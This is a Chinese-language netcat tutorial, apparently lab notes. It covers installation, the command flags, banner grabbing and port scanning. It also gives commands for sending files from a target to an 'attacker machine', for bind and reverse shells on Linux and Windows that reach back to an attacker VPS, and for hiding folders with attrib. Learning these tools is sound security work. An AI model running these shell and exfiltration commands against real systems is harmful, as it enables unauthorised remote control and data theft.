Netcat
從網絡的一段讀取數據,輸出到網絡的另一端(可以使用於TCP和UDP協議)
安裝
-
Windows可自行在github上下載netcat
-
kali linux上
方法一:
sudo yum install nc.x86_64
方法二:
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
編譯完成,就會生成nc可以執行的文件。文件位於src目錄。cd到src目錄
運行 ./netcat
使用
命令查詢 nc -h
參數:
-d 後臺模式
-e 程序重定向,一旦連接,就執行 [危險!!]
-g 網關,設置路由器跳躍通信網關
-G 設置源路由指向器的數量
-h 幫助信息
-i 設置時間間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——只在掃描通信端口時使用
常用命令
一、Banner抓取
服務的Banner信息能夠爲系統管理員提供當前網絡中的系統信息和所運行服務的情況。服務的Banner信息不僅包含正在運行的服務類型,還包含版本信息
nc -nv [目標IP] [port]
二、遠程連接遠程主機
nc -nvv [目標IP] [port]
因爲沒有給它傳輸什麼數據內容,所以NO_DATA
三、端口掃描
nc -v [目標IP] [port]
段端口掃描
nc -v -z [目標IP] [port1-portN]
(速度極慢)
四、端口監聽
nc -l -p [監聽本地端口]
五、文件傳輸流入(本地主機)
nc -lp [監聽本地端口] > 1.txt
文件傳輸流出(目標主機)
nc -vn [攻擊機IP] [攻擊機監聽端口] < 1.txt
六、簡易聊天(本地主機)
nc -lp [監聽端口]
簡易聊天(目標主機)
nc -vn [攻擊機IP] [攻擊機監聽端口]
七、反彈shell
正向與反向。反向通常用在開啓防護措施的目標機器上
1.正向shell
目標主機執行如下命令,監聽目標本機端口
(linux)nc -lvp 4444 -e /bin/sh
(windows)nc -lvp 4444 -e c:\windows\system32\cmd.exe
vps執行如下命令,連接目標主機的4444端口
nc [目標主機IP] [目標主機監聽端口]
2.反向shell
vps執行如下命令,監聽本機端口
nc -lvvp 9999
目標主機執行如下命令,連接vps的9999端口
(linux)nc [vpsIP] [vps監聽端口] -e /bin/sh
(windows)nc [vpsIP] [vps監聽端口] -e c:\windows\system32\cmd.exe
可以在其新建隱藏文件
輸入 attrib +h +r +s
文件夾名,意思就是把該文件夾隱藏、只讀操作
沒恢復可看文件時還不能直接刪除,attrib -h -r -s
就能正常看到文件夾了
GOT IT!
******************************************************
小實驗小結,具體測試利用方式需根據具體實踐場景~